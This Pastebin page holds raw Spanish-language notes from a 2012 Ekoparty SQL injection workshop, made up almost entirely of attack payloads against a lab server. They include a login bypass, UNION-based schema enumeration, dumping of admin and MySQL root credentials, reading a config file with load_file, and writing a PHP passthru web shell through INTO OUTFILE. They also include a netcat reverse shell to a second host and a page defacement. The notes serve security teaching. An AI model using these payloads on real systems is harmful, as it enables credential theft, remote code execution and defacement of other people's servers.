Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ------------------------------------------------------------------------------------
- Notas sueltas (sin filtrado ni limpieza)
- Workshop SQL Injection en la Ekoparty 2012
- Matias Katz
- Mkit Argentina
- matias@matiaskatz.com
- @matiaskatz
- www.matiaskatz.com
- Ni Mkit Argentina ni Matias Katz se hacen responsables del uso de esta informacion
- ------------------------------------------------------------------------------------
- 10.1.8.4
- seleccionar tabla usuarios donde user=$user y pass=$pass
- si trajo al menos 1 registro Todo bien
- user='' OR '1'='1' AND pass='' OR '1'='1'
- hoy es sabado o 1 es 1 y estamos en julio o 1 es 1
- articulo=$id union select null
- Usuarios y contrasenas
- tabla
- campos
- motor bd
- -------------------------------------
- MOSTRAR en pantalla los res.
- group_concat(column_name) from information_schema.columns
- target:administradores
- Stock: id,usuario,password,email,nombre
- select group_concat(usuario),group_concat(password),group_concat(email) from administradores
- select 1,2, load_file('/etc/mysql/my.cnf')
- select 1,user,password from mysql.user where user='root'
- mysql.user
- user
- password
- DVWA
- $var=mysql_real_escape_string($var);
- char(xx,yy,zz)
- char(xx) + char(yy)
- 0xab3f4467
- select 'blablabla' into outfile '/public_html/bla.txt'
- <? passthru('uname -a'); ?>
- nc -e /bin/sh 10.1.8.34 9988
- echo "<font size=20>HACKED!!!</font>" > index.html
- ------------------------------------------------------------------------------------
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
